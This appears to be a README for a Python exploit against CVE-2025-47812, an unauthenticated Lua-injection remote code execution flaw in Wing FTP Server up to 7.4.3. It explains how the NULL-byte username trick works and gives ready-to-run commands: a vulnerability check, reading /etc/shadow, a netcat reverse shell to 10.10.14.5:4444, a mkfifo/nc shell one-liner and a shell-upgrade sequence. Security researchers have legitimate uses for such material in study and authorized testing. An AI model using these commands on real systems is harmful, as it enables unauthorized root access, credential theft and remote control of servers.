## https://sploitus.com/exploit?id=C72BF890-3768-5EDE-9C8C-FD5A92AE9042
# CVE-2025-47812 โ Wing FTP Server Unauth RCE (rewrite)
Python exploit for the unauthenticated Lua-injection RCE in Wing FTP Server โค 7.4.3. Designed for shell delivery โ one command from `check` to a working netcat callback.
> Written some time ago for wingData lab on HTB and open-sourced now. Use only against systems you own or have written permission to test.
## Credits
- **Vulnerability research:** Julien (@MrTuxracer) โ [What the NULL?! Wing FTP Server RCE (CVE-2025-47812)](https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/)
- **Original PoC:** @4m3rr0r โ [github.com/4m3rr0r/CVE-2025-47812-poc](https://github.com/4m3rr0r/CVE-2025-47812-poc)
- **This repo:** a rewrite of the above PoC which is slightly more functional and easier to use.
## Vulnerability summary
Wing FTP's `c_CheckUser()` truncates the `username` at the first NULL byte for authentication, but the session-creation path writes the *full* unsanitized username into a Lua session file. Inject `anonymous%00]]--` and the server happily writes your Lua into the session. Hitting any authenticated endpoint (`dir.html` works) loads that session file via `loadfile()` โ `f()`, executing the injected code as `root` / `SYSTEM`.
Affected: Wing FTP Server โค 7.4.3. Fixed in 7.4.4.
## Install
```bash
pip install requests
```
That's it โ no other dependencies.
## Usage
```bash
# 1. Confirm the target is vulnerable (runs `id` and checks for `uid=`)
python3 exploit.py -u http://target:5466/ check
# 2. One-off command โ captures stdout AND stderr
python3 exploit.py -u http://target:5466/ exec "id"
python3 exploit.py -u http://target:5466/ exec "cat /etc/shadow"
python3 exploit.py -u http://target:5466/ exec "find / -perm -4000 2>/dev/null"
# 3. Reverse shell (the easy path)
# Terminal 1:
nc -lvnp 4444
# Terminal 2:
python3 exploit.py -u http://target:5466/ shell 10.10.14.5 4444
# 4. Detached arbitrary payload โ fire-and-forget. Useful when bash is missing:
python3 exploit.py -u http://target:5466/ detached \
"rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.5 4444 >/tmp/f"
```
### Flags
| Flag | Default | Purpose |
|------|---------|---------|
| `-u`, `--url` | required | Target base URL โ Wing FTP usually listens on `:5466` (HTTP) or `:5467` (HTTPS). |
| `-U`, `--username` | `anonymous` | Username before the NULL byte. Anonymous works on default installs. |
| `-P`, `--password` | empty | Password for the injection POST. Empty is fine for anonymous. |
| `-v`, `--verbose` | off | Dumps the Lua payload, URLs hit, and raw response body. |
### Tips
- Verify the port first. The web UI is **not** on 80 by default โ try `http://target:5466/login.html` in a browser before assuming the URL is wrong.
- If `shell` mode doesn't land a callback, fall back to `detached` with the `mkfifo` payload above. Some minimal Linux images don't ship `bash`.
- Upgrade the caught shell once it lands:
```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z
stty raw -echo; fg
# Enter, Enter
export TERM=xterm
```
## Disclaimer
For educational use and authorized security testing only. You are responsible for the targets you point this at.
## License
MIT โ see [LICENSE](./LICENSE).